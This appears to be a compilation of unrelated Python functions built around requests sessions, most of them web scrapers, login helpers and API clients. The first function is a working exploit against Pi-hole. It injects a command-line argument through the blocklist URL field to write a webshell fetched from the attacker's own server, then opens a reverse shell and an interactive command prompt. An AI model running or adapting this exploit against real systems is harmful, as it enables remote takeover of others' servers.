def exploit(session: requests.session) -> None: print( f"[+] Got session-cookie: PHPSESSID={session.cookies.get_dict()['PHPSESSID']}" ) # Get csrf token #print("[*] Getting CSRF-token") html = session.get(url=f"{url}settings.php?tab=blocklists", proxies=proxy).text soup = BeautifulSoup(html, 'html.parser') token = soup.find("input", {'name': 'token'})['value'] # Stage 1: Trigger connection to our server payload = f'http://{get_ip()}# -o ex.php -d "' data = { 'newuserlists': payload, 'token': token, 'field': 'adlists', 'submit': 'saveupdate' } session.post(url=f"{url}settings.php?tab=blocklists", data=data, proxies=proxy) # Setup http server http = Process(target=setup_http) http.daemon = True http.start() # Trigger access & file write for i in range(2): session.get(url=f"{url}scripts/pi-hole/php/gravity.sh.php", proxies=proxy) # Verify webshell if verify_webshell(): print("[+] Webshell uploaded successfully!") rev_shell() try: while True: cmd = input("cmd> ") print(exec(cmd)) except KeyboardInterrupt: quit() except Exception as ex: raise ex else: raise Exception("Webshell not uploaded!")
def get_recent_news_articles(session: requests.session) -> List[Dict[str, str]]: """ Fetches the most recent news articles for the logged in player :param: The requests session initialized by the ComunioSession :return: List of article dictionaries with the following attributes: - date: The article's date - type: The type of the article, e.g. 'transfers' - content: The article's content """ html = session.get("http://www.comunio.de/team_news.phtml").text soup = BeautifulSoup(html, "html.parser") article_headers = soup.select(".article_header1") + soup.select(".article_header2") article_content = soup.select(".article_content1") + soup.select(".article_content2") articles = [] for index in range(0, len(article_headers)): header = article_headers[index].text.lstrip().rstrip() content = article_content[index].text.lstrip().rstrip() article = { "date": header.split(" ", 1)[0], "type": header.split(" > ", 1)[1], "content": content } articles.append(article) return articles
def _connect(url: str, data: str=None, headers: dict or None=None, auth=None, session: requests.session=__SESSION) -> requests.Response: """ :param url: url :type url: :class:`str` :param data: data to post :type data: :class:`str` :param headers: headers to send :type headers: :class:`dict` or :class:`None` :param auth: the authenticate for the session. :type auth: :class:`requests.auth.HTTPBasicAuth` :param session: the session to connect to, otherwise using the default ones. :type session: :class:`requests.Session` :return: the respond of the connection :rtype: :class:`requests.Response` """ if headers is None: headers = dict() url = url_fixer(url) headers['User-Agent'] = consts.USER_AGENT if data is not None: sock = session.post(url, data=data, headers=headers, auth=auth) else: sock = session.get(url, headers=headers, auth=auth) return sock
def get_authentication_data(s: requests.session, contract_number: str): data = s.get(url='http://cn.its.glo-ots.cn/ITS_EXPORT_AUTHENTICATION.asp?contractid={}&op=0'\ .format(contract_number)) data.encoding = 'gbk' soup = BeautifulSoup(data.text, "lxml") data_dict = {} info_dict = {} cargo_list = [] tables = soup.find_all('table') trs = tables[8].find_all('tr') tds = trs[1].find_all('td') info_dict['目的港'] = tds[0].contents[0].rstrip().lstrip() info_dict['状态'] = tds[1].find('p').contents[0].rstrip().lstrip() info_dict['一般原产地证书'] = tds[2].find('p').contents[0].rstrip().lstrip() info_dict['普惠制原产地证书'] = tds[3].contents[0].rstrip().lstrip() info_dict['认证费用'] = tds[4].contents[0].rstrip().lstrip() for idx, tr in enumerate(tables[11].find_all('tr')): if idx != 0: tds = tr.find_all('td') cargo_dict = {} cargo_dict['货号'] = tds[0].find('a').contents[0].rstrip().lstrip() cargo_dict['品名'] = tds[1].contents[0].rstrip().lstrip() cargo_dict['数量'] = tds[2].contents[0].rstrip().lstrip() cargo_dict['件数'] = tds[3].contents[0].rstrip().lstrip() cargo_dict['毛重'] = tds[4].contents[0].rstrip().lstrip() cargo_list.append(cargo_dict) data_dict["货物信息"] = cargo_list data_dict['检验程序'] = info_dict return data_dict
def get_captcha(session: requests.session): image_data = session.get(url=CAPTCHA_IMAGE_URL, timeout=TIMEOUT) io_file = io.BytesIO(image_data.content) image = Image.open(io_file) image.show() return io_file
def get_sysconf(s: requests.session, page: str, act: str, params): return s.get(url=sysconf, params=dict({ "page": page, "action": act }, **params), verify=False)
def fetch_page(*, url: str, session: requests.session): req = session.get(url) body = req.text if not req.from_cache: # stderr('sleep 5') time.sleep(5) interactive_warning = '<title>Interactive Stories Are Temporarily Unavailable</title>' while interactive_warning in body: sleep_for_url(url) cache_backend.delete_url(url) req = session.get(url) body = req.text return body
def execute_http_call(method, url, params, retry, timeout, apiKey, apiKeyPrefix): """ Executes http call using requests library Parameters ---------- method : str url : str params : dict retry : Retry timeout : tuple Returns ------- Response """ # set session session = Session() session.mount('https://', HTTPAdapter(max_retries=retry)) # Documented in HTTPAdapter session.headers = { 'Authorization': '{} {}'.format(apiKeyPrefix, apiKey), 'Content-Type': 'application/json', 'User-Agent': generate_user_agent(), } if method is "GET": response = session.get(url, params=params, timeout=timeout) elif method is "POST": response = session.post(url, json=params, timeout=timeout) else: raise NotImplementedError() return response
def getInspections(after: datetime, session: requests.session, headers: dict): ''' Get all inspections after (after: ISO Datetime) ''' query = f"https://api.safetyculture.io/audits/search?field=audit_id&field=modified_at&modified_after={after}Z" results = session.get(query, headers=headers) results = results.json() return (results)
def downloader(session: requests.session, url: str, filename: str, **kwargs): with session.get(url, stream=True, **kwargs) as r: if r.status_code == 200: r.raw.decode_content = True with open(filename, "wb") as f: shutil.copyfileobj(r.raw, f) else: raise Exception("Failed to connect")
def get_sysconf_with_sid_header(s: requests.session, page: str, act: str, params): return s.get(url=sysconf, params=dict({ "page": page, "action": act }, **params), verify=False, headers={"sid": s.cookies.get("sid")})
async def checkPages(s: requests.session): for a in range(0, len(urlList)): res1 = s.get(url=urlList[a], allow_redirects=False) if not (urlResultlist[a] in res1.text): print(res1.text) f = open("page.html", 'w', encoding="utf-8") f.write(res1.text) f.close() return False return True
def get_locations( s: requests.session ) -> list: ''' Retrieve latest locations from API ''' ims_locations_url = f'https://{env.ims_ip}/api/location_stats/latest_by_asset/?format=json&limit=100000' locations = s.get(ims_locations_url, verify=False) locations = locations.json() return(locations)
async def loadPages(s: requests.session): for a in range(0, len(urlList)): res1 = s.get(urlList[a]) res = re.search(regexList[a], res1.text).group(1) print(urlList[a]) print(res) print() print() print() urlResultlist.append(res)
def get_own_player_list(session: requests.session) -> List[Dict[str, str or int]]: """ Creates dictionaries modelling the user's current players and returns them in a list. The format of these dictionaries is: name: The player's name value: The player's current value points: The player's currently accumulated performance points position: The player's position :param: The requests session initialized by the ComunioSession :return: A list of the user's players as dictionaries """ player_list = [] sell_html = session.get("http://www.comunio.de/putOnExchangemarket.phtml") on_sale_html = session.get("http://www.comunio.de/exchangemarket.phtml?takeplayeroff_x=22") soups = (BeautifulSoup(sell_html.text, "html.parser"), BeautifulSoup(on_sale_html.text, "html.parser")) for i, soup in enumerate(soups): players = soup.select(".tr1") + soup.select(".tr2") for player in players: attrs = player.select("td") if i == 0: player_info = {"name": attrs[0].text.strip(), "value": int(attrs[2].text.strip().replace(".", "")), "points": int(attrs[3].text.strip()), "position": attrs[4].text.strip()} elif i == 1: player_info = {"name": attrs[1].text.strip(), "value": int(attrs[4].text.strip().replace(".", "")), "points": int(attrs[5].text.strip()), "position": attrs[7].text.strip()} else: player_info = {} player_list.append(player_info) return player_list
def login(session: requests.session, account: str, password: str, captcha_code=None, save_captcha=False): """Login to Mo Online. Arguments: session {requests.session} -- requests session. account {str} -- game account. password {str} -- game password. captcha {str} -- captcha code. Raises: LoginError: description: error_type server_error: Server timeout or error account_error: User password or account error captcha_error: captcha code error. Returns: [str] -- game login url. (moop) """ page = session.get(url=LOGIN_URL, timeout=TIMEOUT) if not isinstance(captcha_code, str): get_captcha(session) captcha_code = input("input captcha code: ") csrf_parse(page.text) login_data = { 'loginAccount': account, 'loginPassword': password, 'loginCode': captcha_code, 'contract1': 'on', 'contract2': 'on', 'contract3': 'on', **csrf_parse(page.text) } post_login = session.post(url=LOGIN_URL, timeout=TIMEOUT, data=login_data) if post_login.url == START_GAME_URL and post_login.status_code == 200: _base_index = post_login.text.find('window.location.href') + 24 return post_login.text[_base_index:post_login.text. find('"', _base_index + 1)] elif post_login.textfind("密碼錯誤") > -1: raise LoginError(error_type='account_error', account=account, message="account or password wrong.") elif post_login.textfind("驗證碼輸入不正確") > -1: raise LoginError(error_type='captcha_error', account=account, message="captcha code error.") raise BaseException("Something error :(")
def check_is_student(s: requests.session) -> bool: """判断用户是否为学生 Args: s (requests.session): session Returns: bool: """ url = s.get("https://www.zhixue.com/container/container/index/").url return "student" in url
def getHTMLText(url: str, rssion: requests.session) -> str: try: resp = rssion.get(url, headers=PttInfo.headers) resp.raise_for_status() resp.encoding = resp.apparent_encoding return resp.text except: print("url: "+url) print("request: "+resp.request) print("響應: "+resp.status_code) return "error resp"
def get_role(s: requests.session) -> str: """ 获取用户角色 :param s: session :return 返回用户角色 """ r = s.get("https://www.zhixue.com/apicourse/web/getCurrentUser") data = r.json() if data["errorCode"] != 0: raise Exception(data["errorInfo"]) return data["result"]["currentUser"]["role"]
def fetch_ads(session: Session) -> Set[AdModel]: url = build_url() ads = [] logger.info('=== Starting fetch ads ===') response = session.get(url) if response.status_code != 200: logger.critical( '=== Unsuccessful attempt. ' 'Please check url - %s ' 'The script will be stopped ===', url) raise RequestsConnectionError( f'Unable to get urls {response.status_code}') soup = BeautifulSoup(response.content.decode('utf-8'), 'lxml') ads_items = soup.find_all('table', attrs={'summary': 'Объявление'}) logger.info('=== Start processing %s ads ===', len(ads_items)) for item in ads_items: item_url_obj = item.find('a', class_='marginright5') item_url, url_info, *_ = item_url_obj.attrs.get('href').split('#') if not settings.WITH_PROMOTED and 'promoted' in url_info: continue try: price = int( item.find( 'p', class_='price').text.split(' грн.')[0].strip().replace( ' ', '')) except ValueError: logger.exception('=== Error during parsing a price ===') continue day = item.select('small > span')[1].text.strip().split(' ')[0].lower() ad = AdModel( external_id=item.attrs.get('data-id'), title=item_url_obj.text.strip(), price=price, url=item_url, ) if day in settings.PUBLICATION_DATE and \ settings.MIN_PRICE <= ad.price <= settings.MAX_PRICE: ads.append(ad) result = {ad for ad in ads} logger.info('=== Found %s ads after filtering ===', len(result)) return result
def get_ip(session: requests.session, raw_url: str): url = make_ipaddress_url(raw_url) try: rs = session.get(url, timeout=5) pattern = r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b" ip_list = re.findall(pattern, rs.text) ip_counter_obj = Counter(ip_list).most_common(1) if ip_counter_obj: return raw_url, ip_counter_obj[0][0] raise Exception("ip address empty") except Exception as ex: print("get: {}, error: {}".format(url, ex)) raise Exception
def get_captcha(s: requests.session): r = s.get("https://pass.changyan.com/kaptcha.jpg", params={ "type": "normal", "d": time.time() * 1000 }) Image.open(BytesIO(r.content)).save("captcha.png") r = requests.post(f"{url}/b", files={ 'image_file': ('captcha.png', open("captcha.png", "rb"), 'application') }) return r.json()["value"]
def getHTMLText(url: str, rssion: requests.session) -> str: try: headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36' } resp = rssion.get(url, headers=headers) resp.raise_for_status() resp.encoding = resp.apparent_encoding return resp.text except: print("請求鏈結: " + resp.request) print("響應: " + resp.status_code) return "error resp"
def get_launchintoinsurance_data(s: requests.session, contract_number: str): data = s.get(url='http://cn.its.glo-ots.cn/its_export_launchintoinsurance.asp?contractid=%27{}%27&op=0'\ .format(contract_number)) data.encoding = 'gbk' soup = BeautifulSoup(data.text, "lxml") data_dict = {} info_dict = {} cargo_list = [] tables = soup.find_all('table') trs = tables[8].find_all('tr') tds = trs[1].find_all('td') info_dict['船名'] = tds[0].contents[0].rstrip().lstrip() info_dict['航次'] = tds[1].contents[0].rstrip().lstrip() info_dict['目的港口'] = tds[2].contents[0].rstrip().lstrip() info_dict['投保金额'] = tds[3].contents[0].rstrip().lstrip() info_dict['保险费'] = tds[4].contents[0].rstrip().lstrip() info_dict['保单号'] = tds[5].contents[0].rstrip().lstrip() if info_dict['保单号'] == '未办理': for idx, tr in enumerate(tables[10].find_all('tr')): if idx != 0: tds = tr.find_all('td') cargo_dict = {} a = tds[0].find_all('a') cargo_dict['货号'] = a[0].contents[0].rstrip().lstrip() cargo_dict['品名'] = tds[1].contents[0].rstrip().lstrip() cargo_dict['数量'] = tds[2].contents[0].rstrip().lstrip() cargo_dict['件数'] = tds[3].contents[0].rstrip().lstrip() cargo_dict['毛重'] = tds[4].contents[0].rstrip().lstrip() cargo_list.append(cargo_dict) else: for idx, tr in enumerate(tables[12].find_all('tr')): if idx != 0: tds = tr.find_all('td') cargo_dict = {} a = tds[0].find_all('a') cargo_dict['货号'] = a[0].contents[0].rstrip().lstrip() cargo_dict['品名'] = tds[1].contents[0].rstrip().lstrip() cargo_dict['数量'] = tds[2].contents[0].rstrip().lstrip() cargo_dict['件数'] = tds[3].contents[0].rstrip().lstrip() cargo_dict['毛重'] = tds[4].contents[0].rstrip().lstrip() cargo_list.append(cargo_dict) data_dict["货物信息"] = cargo_list data_dict['保险信息'] = info_dict return data_dict
def captcha_solver(captcha_image_url: str, session: requests.session) -> dict: response = session.get(captcha_image_url) encoded_string = base64.b64encode(response.content) url = "https://api.apitruecaptcha.org/one/gettext" data = { "userid": TRUECAPTCHA_USERID, "apikey": TRUECAPTCHA_APIKEY, "case": "mixed", "mode": "human", "data": str(encoded_string)[2:-1], } r = requests.post(url=url, json=data) j = json.loads(r.text) return j
def validate_session(session: requests.session) -> bool: # Validate by visit settings, anonymous user will be redirected # to login page. settings_url = "https://www.zhihu.com/settings/profile" verify_rsp = session.get(settings_url) if not (verify_rsp.url == settings_url): obsolete_session_file = os.path.join(os.path.dirname(os.path.abspath(__file__)), SESSION_FILENAME) if os.path.exists(obsolete_session_file): os.remove(obsolete_session_file) raise ValueError("check COOKIE_VALUE in settings.py.") return True
def retrieve(url): session = RequestSession() headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3' } request = session.get(url, headers=headers) if not request.ok: return False res = BytesIO() res.write(request.content) return res
def try_get_url(cls, session: requests.session, url: str, *, try_times: int = 3, try_timeout: int = 5, **kwargs) -> Optional[requests.Response]: for _ in range(try_times): try: r = session.get(url=url, timeout=try_timeout, **kwargs) return r except (requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout) as e: pass return None
def getInspectionDetails(inspections: list, session: requests.session, headers: dict): ''' For each inspection, get the details ''' details = [] for inspection in inspections['audits']: results = session.get( f"https://api.safetyculture.io/audits/{inspection['audit_id']}", headers=headers) results = results.json() # Convert date time strings to datetime object results['created_at'] = datetime.strptime(results['created_at'], '%Y-%m-%dT%H:%M:%S.%fZ') results['modified_at'] = datetime.strptime(results['modified_at'], '%Y-%m-%dT%H:%M:%S.%fZ') details.append(results) return (details)
def get_shipment_data(s: requests.session, contract_number: str): global config data = s.get(url='http://cn.its.glo-ots.cn/ITS_EXPORT_SHIPMENT.asp?contractid={}&op=0'\ .format(contract_number)) data.encoding = 'gbk' soup = BeautifulSoup(data.text, "lxml") data_dict = {} info_dict = {} cargo_list = [] tables = soup.find_all('table') trs = tables[8].find_all('tr') tds = trs[1].find_all('td') info_dict['提单号'] = tds[0].find('p').contents[0].rstrip().lstrip() info_dict['目的港'] = tds[1].find('p').contents[0].rstrip().lstrip() info_dict['船名'] = tds[2].contents[0].rstrip().lstrip() info_dict['航次'] = tds[3].contents[0].rstrip().lstrip() info_dict['装船日期'] = tds[4].find('p').contents[0].rstrip().lstrip() trs = tables[9].find_all('tr') tds = trs[1].find_all('td') info_dict['20FCL海洋运费'] = tds[0].find('p').contents[0].rstrip().lstrip() info_dict['40FCL海洋运费'] = tds[1].find('p').contents[0].rstrip().lstrip() info_dict['付费方式'] = tds[2].find('p').contents[0].rstrip().lstrip() info_dict['20FCL个数'] = tds[3].find('p').contents[0].rstrip().lstrip() info_dict['40FCL个数'] = tds[4].find('p').contents[0].rstrip().lstrip() for idx, tr in enumerate(tables[10].find_all('tr')): if idx != 0: tds = tr.find_all('td') cargo_dict = {} cargo_dict['货号'] = tds[0].find('a').contents[0].rstrip().lstrip() cargo_dict['品名'] = tds[1].contents[0].rstrip().lstrip() cargo_dict['数量'] = tds[2].contents[0].rstrip().lstrip() cargo_dict['件数'] = tds[3].contents[0].rstrip().lstrip() cargo_dict['毛重'] = tds[4].contents[0].rstrip().lstrip() cargo_list.append(cargo_dict) data_dict["货物信息"] = cargo_list data_dict['装船信息'] = info_dict return data_dict
def get_servers(sess_id: str, session: requests.session) -> {}: d = {} url = "https://support.euserv.com/index.iphp?sess_id=" + sess_id headers = { "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) " "Chrome/83.0.4103.116 Safari/537.36", "origin": "https://www.euserv.com" } f = session.get(url=url, headers=headers) f.raise_for_status() soup = BeautifulSoup(f.text, 'html.parser') for tr in soup.select('#kc2_order_customer_orders_tab_content_1 .kc2_order_table.kc2_content_table tr'): server_id = tr.select('.td-z1-sp1-kc') if not len(server_id) == 1: continue flag = True if tr.select('.td-z1-sp2-kc .kc2_order_action_container')[ 0].get_text().find('Contract extension possible from') == -1 else False d[server_id[0].get_text()] = flag return d